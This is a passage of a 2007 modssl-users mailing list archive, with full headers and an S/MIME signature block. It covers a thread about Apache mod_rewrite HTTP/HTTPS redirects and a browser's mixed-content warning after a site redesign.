<425569.89056.qm@web25405.mail.ukl.yahoo.com> MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <425569.89056.qm@web25405.mail.ukl.yahoo.com> X-Mailer: mutt Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Mads Toftum X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users On Wed, Sep 12, 2007 at 09:55:52AM +0100, Glyn Astill wrote: > "Considering this a mailing list for modssl 1.x not 2.x" > mod_ssl _for httpd 1.3_ not _modssl for httpd 2.x_. With httpd 2.x, modssl is integrated and doesn't need an external patch. That being said, I've seen quite a bit of httpd 2.x related modssl talk here and not heard many complaints. vh Mads Toftum -- http://soulfood.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Wed Sep 19 19:28:37 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id 65A9314D887; Wed, 19 Sep 2007 19:28:37 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from robbie.comodo.net (mcr.comodogroup.com [82.110.55.14]) by master.modssl.org (Postfix) with ESMTP id B0FFA14D836 for ; Wed, 19 Sep 2007 19:28:36 +0200 (CEST) Received: (qmail 31707 invoked by uid 1114); 19 Sep 2007 17:28:24 -0000 Received: from Unknown (HELO lindsay) (192.168.68.56) (smtp-auth username lindsayh, mechanism login) by robbie.comodo.net (qpsmtpd/0.40) with ESMTPA; Wed, 19 Sep 2007 18:28:24 +0100 From: "Lindsay Hausner" To: References: Subject: RE: Urgent help please Date: Wed, 19 Sep 2007 13:29:17 -0400 MIME-Version: 1.0 Message-ID: <003b01c7fae2$9ed74750$3844a8c0@lindsay> X-Mailer: Microsoft Office Outlook 11 Content-Type: multipart/signed; protocol="application/x-pkcs7-signature"; micalg=SHA1; boundary="----=_NextPart_000_0036_01C7FAC1.138FECE0" Thread-Index: AcfV2BDh5FkZOzskSj2gYv/4ZXFcnwlCarCw In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.3138 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Lindsay Hausner" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users This is a multi-part message in MIME format. ------=_NextPart_000_0036_01C7FAC1.138FECE0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Jones, Stephen (SJONES) Sent: Friday, August 03, 2007 10:16 AM To: modssl-users@modssl.org Subject: Urgent help please Hello, My site just did a redesign and now the SSL's do not work as desired and I have no clue why. Here is the scenario: The Home page on initial connection is NOT using SSL. I can select any noon SSL page and remain a noon SSL page I select one of the 2 SSL pages and I get SSL (ie: https in the address bar and the lock icon in the browser) >From this point on every page is now defined as SSL. I see this by picking any link on the page and the link displayed in the lower left corner is listed as https. If I choose the link the address bar is https and the lock icon appears. The problem is that if I choose any of the links back to the Home page I get the POP up "This page contains both secure and non secure item." The address bar stays as https but the lock icon disappears. No changes were made to the httpd.conf or ssl.conf files. I have the following redirects in place and I can see the first 2 working when I enable rewrite logging. I never see the 3rd one run. RewriteCond %{HTTPS} !=on RewriteCond %{REQUEST_URI} ^.*/cf/store/.* RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R] ## For Digsig RewriteCond %{HTTPS} !=on RewriteCond %{REQUEST_URI} ^.*/cf/digsig/.* RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R] ## For Everything Else RewriteCond %{HTTPS} =on RewriteCond %{REQUEST_URI} ^.*/.* RewriteRule ^/(.*) http://%{SERVER_NAME}/$1 [L,R] Any suggestions as to what or where to look would be greatly appreciated. Sorry for the delay. "This page contains both secure and non secure item." means there are url paths in page oontent (usually graphics...image sources for links and the like) which are http (and need to be https). I'm not to familiar w/ mod_rewrite, but a guess is that your rules apply to actual links, but not urls for content such as .gif or .jpg files. Hope this helps. lh.. ------=_NextPart_000_0036_01C7FAC1.138FECE0 Content-Type: application/x-pkcs7-signature; name="smime.p7s" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="smime.p7s" MIAGCSqGSIb3DQEHAqCAMIACAQExCzAJBgUrDgMCGgUAMIAGCSqGSIb3DQEHAQAAoIIO+jCCBDIw ggMaoAMCAQICAQEwDQYJKoZIhvcNAQEFBQAwezELMAkGA1UEBhMCR0IxGzAZBgNVBAgMEkdyZWF0 ZXIgTWFuY2hlc3RlcjEQMA4GA1UEBwwHU2FsZm9yZDEaMBgGA1UECgwRQ29tb2RvIENBIExpbWl0 ZWQxITAfBgNVBAMMGEFBQSBDZXJ0aWZpY2F0ZSBTZXJ2aWNlczAeFw0wNDAxMDEwMDAwMDBaFw0y ODEyMzEyMzU5NTlaMHsxCzAJBgNVBAYTAkdCMRswGQYDVQQIDBJHcmVhdGVyIE1hbmNoZXN0ZXIx EDAOBgNVBAcMB1NhbGZvcmQxGjAYBgNVBAoMEUNvbW9kbyBDQSBMaW1pdGVkMSEwHwYDVQQDDBhB QUEgQ2VydGlmaWNhdGUgU2VydmljZXMwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQC+ QJ30buHqdoccTUVEjr5GyIMGncEq/hgfjuQC+vOrXVCKFjELmgbQxXAizUktVGPMtm5oRgtT6stM JMC8ck7q8RWu9FSaEgrDerIzYOLaiVXzIljz3tzP74OGooyUT59o8piQRoQnx3a/48w1LIteB2Rl gsBIsKiR+WGfdiBQqJHHZrXreGIDVvCKGhPqMaMeoJn9OPb2JzJYbwf1a7j7FCuvt6rM1mNfc4za BZmoOKjLF3g2UazpnvR4Oo3PD9lC4pgMqy+fDgHe75+ZSfEt36x0TRuYtUfF5SnR+ZAYx2KcvoPH Jns+iiXHwN2d5jVoECCdj9je0sOEnA1e6C/JAgMBAAGjgcAwgb0wHQYDVR0OBBYEFKARCiM+lvEH 7OKvKe+CpX/QMKS0MA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MHsGA1UdHwR0MHIw OKA2oDSGMmh0dHA6Ly9jcmwuY29tb2RvY2EuY29tL0FBQUNlcnRpZmljYXRlU2VydmljZXMuY3Js MDagNKAyhjBodHRwOi8vY3JsLmNvbW9kby5uZXQvQUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmww DQYJKoZIhvcNAQEFBQADggEBAAhW/ALwm+j/pPrWe8ZEgM5PxMX2AFjMpra8FEloBHbo5u5d7AIP YNaNUBhPJk4B4+awpe6/vHRUQb/9/BK4x09a9IlgBX9gtwVK8/bxwr/EuXSGti19a8zS80bdL8bg asPDNAMsfZbdWsIOpwqZwQWLqwwv81w6z2w3VQmH3lNAbFjv/LarZW4E9hvcPOBaFcae2fFZSDAh ZQNs7Okhc+ybA6HgN62gFRiP+roCzqcsqRATLNTlCCarIpdg+JBedNSimlO98qlo4KJuwtdssaMP nr/raOdW8q7y4ys4OgmBtWuF174t7T8at7Jj4vViLILUagBBUPE5g5+V6TaWmG4wggTdMIIDxaAD AgECAhBxkvvmGV+sTRKFdHE0ohinMA0GCSqGSIb3DQEBBQUAMHsxCzAJBgNVBAYTAkdCMRswGQYD VQQIDBJHcmVhdGVyIE1hbmNoZXN0ZXIxEDAOBgNVBAcMB1NhbGZvcmQxGjAYBgNVBAoMEUNvbW9k byBDQSBMaW1pdGVkMSEwHwYDVQQDDBhBQUEgQ2VydGlmaWNhdGUgU2VydmljZXMwHhcNMDQwMTAx MDAwMDAwWhcNMjgxMjMxMjM1OTU5WjCBrjELMAkGA1UEBhMCVVMxCzAJBgNVBAgTAlVUMRcwFQYD VQQHEw5TYWx0IExha2UgQ2l0eTEeMBwGA1UEChMVVGhlIFVTRVJUUlVTVCBOZXR3b3JrMSEwHwYD VQQLExhodHRwOi8vd3d3LnVzZXJ0cnVzdC5jb20xNjA0BgNVBAMTLVVUTi1VU0VSRmlyc3QtQ2xp ZW50IEF1dGhlbnRpY2F0aW9uIGFuZCBFbWFpbDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoC ggEBALI5haTyfatBO2JGN67NwWB1vDll+UoaR6K5zEjMapjVTTUZuaRC5c5J4oovHnzSMQfHTrSD ZJ0uKdWiZMSFvYVRNXmkTmiQexx6pJKoF/KYFfKTzMmkMpW7DE8wvZigC4vlbhuiRvp4vKJvq1le pS/Pytptqi/rrKGzaqq3Lmc1i3nhHmmI4uZGzaCl6r4LznY6eg6b6vzaJ1s9cx8i5khhxkzzabGo Lhu21DEgLLyCio6kDqXXiUP8FlqvHXHXEVnauocNr/rz4cLwpMVnjNbWVDreCqS6A3ezZcj9HtN0 YqoYymiTHqGFfvVHZcv4TVcodNI0/zC27vZiMBSMLOsCAwEAAaOCAScwggEjMB8GA1UdIwQYMBaA FKARCiM+lvEH7OKvKe+CpX/QMKS0MB0GA1UdDgQWBBSJgmd9xJ0mcABLtFBIfN49rgRufTAOBgNV HQ8BAf8EBAMCAQYwDwYDVR0TAQH/BAUwAwEB/zAdBgNVHSUEFjAUBggrBgEFBQcDAgYIKwYBBQUH AwQwEQYDVR0gBAowCDAGBgRVHSAAMHsGA1UdHwR0MHIwOKA2oDSGMmh0dHA6Ly9jcmwuY29tb2Rv Y2EuY29tL0FBQUNlcnRpZmljYXRlU2VydmljZXMuY3JsMDagNKAyhjBodHRwOi8vY3JsLmNvbW9k by5uZXQvQUFBQ2VydGlmaWNhdGVTZXJ2aWNlcy5jcmwwEQYJYIZIAYb4QgEBBAQDAgEGMA0GCSqG SIb3DQEBBQUAA4IBAQCdlcs8uH6lCcQevwvCx3aOOTyUxhCqTwzJ4KuEXYlU4GU7820cfDcsJVRf liH8N4SRnRXcFE+Bz1Qda2xFYMct+ZdRTPlmyjyggoymyPDi6dRK+ew/VsnddozDggFPbADzHhph dARHA6nGQFeRvGUixSdnT1fbZFrZjR+6hi/0Bq6cae3p9M8pF9jgSp8aIC+XTFG7RgfEijdOIOMJ MWjHnsSLneh+EbwyaBCWEZhE2CpRYE2I63Q630MGMsg5Vow6EVLTQaRDA/Tt7zMn2zngFE4mydj1 OeKJuJNdtykmQeqzm66D/Hd1yujKtf7iZUpjPkTE0MNeh3OpmByvfxV/MIIF3zCCBMegAwIBAgIR AO+aNKrZRSGJP6+TzGM+iPAwDQYJKoZIhvcNAQEFBQAwga4xCzAJBgNVBAYTAlVTMQswCQYDVQQI EwJVVDEXMBUGA1UEBxMOU2FsdCBMYWtlIENpdHkxHjAcBgNVBAoTFVRoZSBVU0VSVFJVU1QgTmV0 d29yazEhMB8GA1UECxMYaHR0cDovL3d3dy51c2VydHJ1c3QuY29tMTYwNAYDVQQDEy1VVE4tVVNF UkZpcnN0LUNsaWVudCBBdXRoZW50aWNhdGlvbiBhbmQgRW1haWwwHhcNMDcwMTMwMDAwMDAwWhcN MDgwMTMwMjM1OTU5WjCB5TE1MDMGA1UECxMsQ29tb2RvIFRydXN0IE5ldHdvcmsgLSBQRVJTT05B IE5PVCBWQUxJREFURUQxRjBEBgNVBAsTPVRlcm1zIGFuZCBDb25kaXRpb25zIG9mIHVzZTogaHR0 cDovL3d3dy5jb21vZG8ubmV0L3JlcG9zaXRvcnkxHzAdBgNVBAsTFihjKTIwMDMgQ29tb2RvIExp bWl0ZWQxGDAWBgNVBAMTD0xpbmRzYXkgSGF1c25lcjEpMCcGCSqGSIb3DQEJARYabGluZHNheS5o YXVzbmVyQGNvbW9kby5jb20wgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAMa23GPPcE4rBNJ+ IqRJw5ynSm75t31AcqaUQXHnQeQJpdn3gX9SjtnUVdyrhZHwIE2fv/O5LMJl58EgazGZHk5XoVC8 LmEsUBBSHmEgWIfKjYu4fyYnaIoNlxOFe93unULBPDjMU2lJDr319aLtJ8pv/iSb19RLTkkD8MJQ ATazAgMBAAGjggJBMIICPTAfBgNVHSMEGDAWgBSJgmd9xJ0mcABLtFBIfN49rgRufTAdBgNVHQ4E FgQUPjZgh73bAK8kksszGcXwLfH0AowwDgYDVR0PAQH/BAQDAgWgMAwGA1UdEwEB/wQCMAAwKgYD VR0lBCMwIQYIKwYBBQUHAwQGCCsGAQUFBwMCBgsrBgEEAbIxAQMFAjARBglghkgBhvhCAQEEBAMC BaAwRgYDVR0gBD8wPTA7BgwrBgEEAbIxAQIBAQEwKzApBggrBgEFBQcCARYdaHR0cHM6Ly9zZWN1 cmUuY29tb2RvLm5ldC9DUFMwgaUGA1UdHwSBnTCBmjBMoEqgSIZGaHR0cDovL2NybC5jb21vZG9j YS5jb20vVVROLVVTRVJGaXJzdC1DbGllbnRBdXRoZW50aWNhdGlvbmFuZEVtYWlsLmNybDBKoEig RoZEaHR0cDovL2NybC5jb21vZG8ubmV0L1VUTi1VU0VSRmlyc3QtQ2xpZW50QXV0aGVudGljYXRp b25hbmRFbWFpbC5jcmwwgYYGCCsGAQUFBwEBBHoweDA7BggrBgEFBQcwAoYvaHR0cDovL2NydC5j b21vZG9jYS5jb20vVVROQWRkVHJ1c3RDbGllbnRDQS5jcnQwOQYIKwYBBQUHMAKGLWh0dHA6Ly9j cnQuY29tb2RvLm5ldC9VVE5BZGRUcnVzdENsaWVudENBLmNydDAlBgNVHREEHjAcgRpsaW5kc2F5 LmhhdXNuZXJAY29tb2RvLmNvbTANBgkqhkiG9w0BAQUFAAOCAQEApJGeQlxwtJpomriEFDeNWMNu XXHfGfhtCl0V9xDrh8VWqi51KwFSq6tc2IkCDa5m5Sg1eq+1ngitHu3StjjNS+0lk3abnr+Dxq/l pAQdXF/JalCJOxOn4Fpv69x9+8u21TvuHpzxCK99wm6Ey6D86VfjfjNFZNxF4JKq/w6V9mVBOlB8 x+UxdsycY/8Hi37ZsSoPmZtGYPYINtT5FDtV7ZpNEvjHidDqN1xUCjBaiqdoO4p+htbyD8Ec2z+3 CB3tPrceXX3/XVm9Lx1tXwJLfQUXPyk7AvckQJUHkcwiHHwUtJwdY0UXvWmW7ER3M7S88s9nJPkN zYyXM+f9bX3YtTGCA+cwggPjAgEBMIHEMIGuMQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQxFzAV BgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYDVQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxITAf BgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJzdC1D bGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVtYWlsAhEA75o0qtlFIYk/r5PMYz6I8DAJBgUrDgMC GgUAoIICeDAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0wNzA5MTkx NzI5MTZaMCMGCSqGSIb3DQEJBDEWBBRW/ex65N8Uc88qnnKTbaXtOxVhXjBnBgkqhkiG9w0BCQ8x WjBYMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIBQDAHBgUrDgMCBzAN BggqhkiG9w0DAgIBKDAHBgUrDgMCGjAKBggqhkiG9w0CBTCB1QYJKwYBBAGCNxAEMYHHMIHEMIGu MQswCQYDVQQGEwJVUzELMAkGA1UECBMCVVQxFzAVBgNVBAcTDlNhbHQgTGFrZSBDaXR5MR4wHAYD VQQKExVUaGUgVVNFUlRSVVNUIE5ldHdvcmsxITAfBgNVBAsTGGh0dHA6Ly93d3cudXNlcnRydXN0 LmNvbTE2MDQGA1UEAxMtVVROLVVTRVJGaXJzdC1DbGllbnQgQXV0aGVudGljYXRpb24gYW5kIEVt YWlsAhEA75o0qtlFIYk/r5PMYz6I8DCB1wYLKoZIhvcNAQkQAgsxgceggcQwga4xCzAJBgNVBAYT AlVTMQswCQYDVQQIEwJVVDEXMBUGA1UEBxMOU2FsdCBMYWtlIENpdHkxHjAcBgNVBAoTFVRoZSBV U0VSVFJVU1QgTmV0d29yazEhMB8GA1UECxMYaHR0cDovL3d3dy51c2VydHJ1c3QuY29tMTYwNAYD VQQDEy1VVE4tVVNFUkZpcnN0LUNsaWVudCBBdXRoZW50aWNhdGlvbiBhbmQgRW1haWwCEQDvmjSq 2UUhiT+vk8xjPojwMA0GCSqGSIb3DQEBAQUABIGARzY9iemVdya2ZEki7uoOszZPeRXl/skWYLc6 TbrOgXTjBFBbGob8dorRcbH2sR2IuIj5RdvrfDLuRSLWjjLDFq/jZ5yeNP1V8a8qvIGkzBlWysaX kpxCW2bYYy3Lw1JMmYKsXEYmBBwJUMZf8bI+Ot5gHTwcEf8WALRLLvnN8AAAAAAAAAA= ------=_NextPart_000_0036_01C7FAC1.138FECE0-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Sep 20 00:36:08 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id B4A3A14D84B; Thu, 20 Sep 2007 00:36:08 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from web53708.mail.re2.yahoo.com (web53708.mail.re2.yahoo.com [206.190.37.29]) by master.modssl.org (Postfix) with SMTP id 6188F14D833 for ; Thu, 20 Sep 2007 00:36:02 +0200 (CEST) Received: (qmail 84940 invoked by uid 60001); 19 Sep 2007 22:35:50 -0000 DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=X-YMail-OSG:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding:Message-ID; b=K5kWMTlCVwXJAkSnFJvtBhLmS3IDHLaSTlNjV0VdNd7fos3f0bs97gD7ckwqhxHTnyk1avxC6Mi3J4S7TC66G6Q9uOofCEgpJahWGoeF2YipMJBXumKSfrYM7/nkKcRAgZkD2a/YKmsvS/ho3lHZzMD4Dbg4fb49W7LPEcByZ9g=; X-YMail-OSG: PJubWV4VM1m9m5jQOj36mx2BzCSzKxOA7dKNWoz0tAy.lk1VxKzhwd7EnNqUGogkKg-- Received: from [71.232.60.65] by web53708.mail.re2.yahoo.com via HTTP; Wed, 19 Sep 2007 15:35:50 PDT Date: Wed, 19 Sep 2007 15:35:50 -0700 (PDT) From: a k Subject: RE: Urgent help please To: modssl-users@modssl.org In-Reply-To: <003b01c7fae2$9ed74750$3844a8c0@lindsay> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="0-2026516097-1190241350=:84352" Content-Transfer-Encoding: 8bit Message-ID: <764861.84352.qm@web53708.mail.re2.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: a k X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users --0-2026516097-1190241350=:84352 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Pretty sure that is a browser issue and not a web site issue. Lindsay Hausner wrote: -----Original Message----- From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] On Behalf Of Jones, Stephen (SJONES) Sent: Friday, August 03, 2007 10:16 AM To: modssl-users@modssl.org Subject: Urgent help please Hello, My site just did a redesign and now the SSL's do not work as desired and I have no clue why. Here is the scenario: The Home page on initial connection is NOT using SSL. I can select any noon SSL page and remain a noon SSL page I select one of the 2 SSL pages and I get SSL (ie: https in the address bar and the lock icon in the browser) >From this point on every page is now defined as SSL. I see this by picking any link on the page and the link displayed in the lower left corner is listed as https. If I choose the link the address bar is https and the lock icon appears. The problem is that if I choose any of the links back to the Home page I get the POP up "This page contains both secure and non secure item." The address bar stays as https but the lock icon disappears. No changes were made to the httpd.conf or ssl.conf files. I have the following redirects in place and I can see the first 2 working when I enable rewrite logging. I never see the 3rd one run. RewriteCond %{HTTPS} !=on RewriteCond %{REQUEST_URI} ^.*/cf/store/.* RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R] ## For Digsig RewriteCond %{HTTPS} !=on RewriteCond %{REQUEST_URI} ^.*/cf/digsig/.* RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R] ## For Everything Else RewriteCond %{HTTPS} =on RewriteCond %{REQUEST_URI} ^.*/.* RewriteRule ^/(.*) http://%{SERVER_NAME}/$1 [L,R] Any suggestions as to what or where to look would be greatly appreciated. Sorry for the delay. "This page contains both secure and non secure item." means there are url paths in page oontent (usually graphics...image sources for links and the like) which are http (and need to be https). I'm not to familiar w/ mod_rewrite, but a guess is that your rules apply to actual links, but not urls for content such as .gif or .jpg files. Hope this helps. lh.. --------------------------------- Moody friends. Drama queens. Your life? Nope! - their life, your story. Play Sims Stories at Yahoo! Games. --0-2026516097-1190241350=:84352 Content-Type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Pretty sure that is a browser issue and not a web site issue.

Lindsay Hausner <lindsay.hausner@comodo.com> wrote:


-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
On Behalf Of Jones, Stephen (SJONES)
Sent: Friday, August 03, 2007 10:16 AM
To: modssl-users@modssl.org
Subject: Urgent help please

Hello,

My site just did a redesign and now the SSL's do not work as desired
and I have no clue why.

Here is the scenario:

The Home page on initial connection is NOT using SSL.

I can select any noon SSL page and remain a noon SSL page

I select one of the 2 SSL pages and I get SSL (ie: https in the address
bar and the lock icon in the browser)

From this point on every page is now defined as SSL. I see this by
picking
any link on the page and the link displayed in the lower left corner is
listed as https. If I choose the link the address bar is https and the
lock icon appears.

The problem is that if I choose any of the links back to the Home page I
get the POP up "This page contains both secure and non secure item."

The address bar stays as https but the lock icon disappears.

No changes were made to the httpd.conf or ssl.conf files.

I have the following redirects in place and I can see the first 2
working when I enable rewrite logging.

I never see the 3rd one run.

RewriteCond %{HTTPS} !=on
RewriteCond %{REQUEST_URI} ^.*/cf/store/.*
RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R]


## For Digsig
RewriteCond %{HTTPS} !=on
RewriteCond %{REQUEST_URI} ^.*/cf/digsig/.*
RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R]

## For Everything Else
RewriteCond %{HTTPS} =on
RewriteCond %{REQUEST_URI} ^.*/.*
RewriteRule ^/(.*) http://%{SERVER_NAME}/$1 [L,R]

Any suggestions as to what or where to look would be greatly
appreciated.

Sorry for the delay.

"This page contains both secure and non secure item." means there are url
paths in page oontent (usually graphics...image sources for links and the
like) which are http (and need to be https). I'm not to familiar w/
mod_rewrite, but a guess is that your rules apply to actual links, but not
urls for content such as .gif or .jpg files.

Hope this helps.

lh..


Moody friends. Drama queens. Your life? Nope! - their life, your story.
Play Sims Stories at Yahoo! Games. --0-2026516097-1190241350=:84352-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Sep 20 01:59:20 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id A5E2C14D84B; Thu, 20 Sep 2007 01:59:20 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from wa-out-1112.google.com (wa-out-1112.google.com [209.85.146.183]) by master.modssl.org (Postfix) with ESMTP id D654C14D833 for ; Thu, 20 Sep 2007 01:59:16 +0200 (CEST) Received: by wa-out-1112.google.com with SMTP id j32so408795waf for ; Wed, 19 Sep 2007 16:59:04 -0700 (PDT) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=beta; h=domainkey-signature:received:received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; bh=9ZhtvZJlYn0AVitD7/LJWgoENCxtdfTl16gpj3k4G7s=; b=nkzBsVAS+Q4x/FTKBMOfjm3szBJ2bxukAhDGUSEHnXIHROul7pvUhzm+DPGe15BYzOtY+VVpsn1Prb3gijPQ5kUeiVS+D0cLpSxsb4TuW8CBm/MlSgygfsropI/v7KZb8c3bndlpZt5+SSCUlcLcIyLcY9rwvuwB5hs2i7gXQqg= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=beta; h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references; b=JwefORZcUpALLR51Jj+xjNG7TbIFNzpQrDRlpZdQAsYeSKsA24oxRTrolqPzNzBFbwybCLFpFzGK/aPQlnbSLBSBRPxKlVY/9PpczZIjuH2HN/CMFX5mKAVEU7EFhR4MlToG/sXu1/3bytd5ZyYU476kp3DhOfazc7oF2IgKOZk= Received: by 10.114.78.1 with SMTP id a1mr906295wab.1190246343995; Wed, 19 Sep 2007 16:59:03 -0700 (PDT) Received: by 10.141.27.2 with HTTP; Wed, 19 Sep 2007 16:59:03 -0700 (PDT) Message-ID: <740f716a0709191659t2d7fe60asfe3b870ad382abcb@mail.gmail.com> Date: Wed, 19 Sep 2007 16:59:03 -0700 From: "Yvo van Doorn" To: modssl-users@modssl.org Subject: Re: Urgent help please In-Reply-To: <764861.84352.qm@web53708.mail.re2.yahoo.com> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline References: <003b01c7fae2$9ed74750$3844a8c0@lindsay> <764861.84352.qm@web53708.mail.re2.yahoo.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Yvo van Doorn" X-List-Manager: Majordomo [version 1.94.5] X-List-Name: modssl-users Actually more specifically a web site development issue. You most likely have static links pointing to content in your web development code (html, css, php, whatever language they have). mod_rewrite doesn't rewrite your actual code, you need to do that. An *example* would be . When you attempt to access this on a secure page a certain web browser (HINT: IE) goes all nutty and complains like you mention in your original request. This is definitely not the correct place for the problem you experience. A good & decent google search would've clued you in on any of this. I highly suggest this website on how to use Google: http://www.googleguide.com/ On 9/19/07, a k wrote: > Pretty sure that is a browser issue and not a web site issue. > > > Lindsay Hausner wrote: > > > -----Original Message----- > From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org] > On Behalf Of Jones, Stephen (SJONES) > Sent: Friday, August 03, 2007 10:16 AM > To: modssl-users@modssl.org > Subject: Urgent help please > > Hello, > > My site just did a redesign and now the SSL's do not work as desired > and I have no clue why. > > Here is the scenario: > > The Home page on initial connection is NOT using SSL. > > I can select any noon SSL page and remain a noon SSL page > > I select one of the 2 SSL pages and I get SSL (ie: https in the address > bar and the lock icon in the browser) > > From this point on every page is now defined as SSL. I see this by > picking > any link on the page and the link displayed in the lower left corner is > listed as https. If I choose the link the address bar is https and the > lock icon appears. > > The problem is that if I choose any of the links back to the Home page I > get the POP up "This page contains both secure and non secure item." > > The address bar stays as https but the lock icon disappears. > > No changes were made to the httpd.conf or ssl.conf files. > > I have the following redirects in place and I can see the first 2 > working when I enable rewrite logging. > > I never see the 3rd one run. > > RewriteCond %{HTTPS} !=on > RewriteCond %{REQUEST_URI} ^.*/cf/store/.* > RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R] > > > ## For Digsig > RewriteCond %{HTTPS} !=on > RewriteCond %{REQUEST_URI} ^.*/cf/digsig/.* > RewriteRule ^/(.*) https://%{SERVER_NAME}/$1 [L,R] > > ## For Everything Else > RewriteCond %{HTTPS} =on > RewriteCond %{REQUEST_URI} ^.*/.* > RewriteRule ^/(.*) http://%{SERVER_NAME}/$1 [L,R] > > Any suggestions as to what or where to look would be greatly > appreciated. > > Sorry for the delay. > > "This page contains both secure and non secure item." means there are url > paths in page oontent (usually graphics...image sources for links and the > like) which are http (and need to be https). I'm not to familiar w/ > mod_rewrite, but a guess is that your rules apply to actual links, but not > urls for content such as .gif or .jpg files. > > Hope this helps. > > lh.. > > > > > ________________________________ > Moody friends. Drama queens. Your life? Nope! - their life, your story. > Play Sims Stories at Yahoo! Games. > > ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Thu Sep 20 14:04:00 2007 Return-Path: X-Original-To: modssl-users-L Delivered-To: modssl-users-L@master.modssl.org Received: by master.modssl.org (Postfix, from userid 30101) id E091214D84B; Thu, 20 Sep 2007 14:03:59 +0200 (CEST) X-Original-To: modssl-users@modssl.org Delivered-To: modssl-users@modssl.org Received: from sdaw.argati.com (backsrv2.argati.com [208.69.88.22]) by master.modssl.org (Postfix) with ESMTP id 7204614D833 for ; Thu, 20 Sep 2007 14:03:55 +0200 (CEST) Received: from sdaw.argati.com by sdaw.argati.com with HTTP (Code-Crafters Ability Mail Server 2.60); Thu, 20 Sep 2007 08:03:35 -0400 From: "Kevin Klawon" To: Subject: Re: Urgent help please Date: Thu, 20 Sep 2007 08:03:35 -0400 Message-ID: <2370422283.20070920080335@sdaw.argati.com> MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="g55oQVFxAO3uuMYjNL2tPKeDndp7SveFnmHfcdC7ll1Pv=====" X-Mailer: Ability Mail Server 2.60 WebMail (by Code-Crafters) In-Reply-To: <740f716a0709191659t2d7fe60asfe3b870ad382abcb@mail.gmail.com> Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Kevin Klawon" X-List-Manager: Majordomo [version 1.94.5] 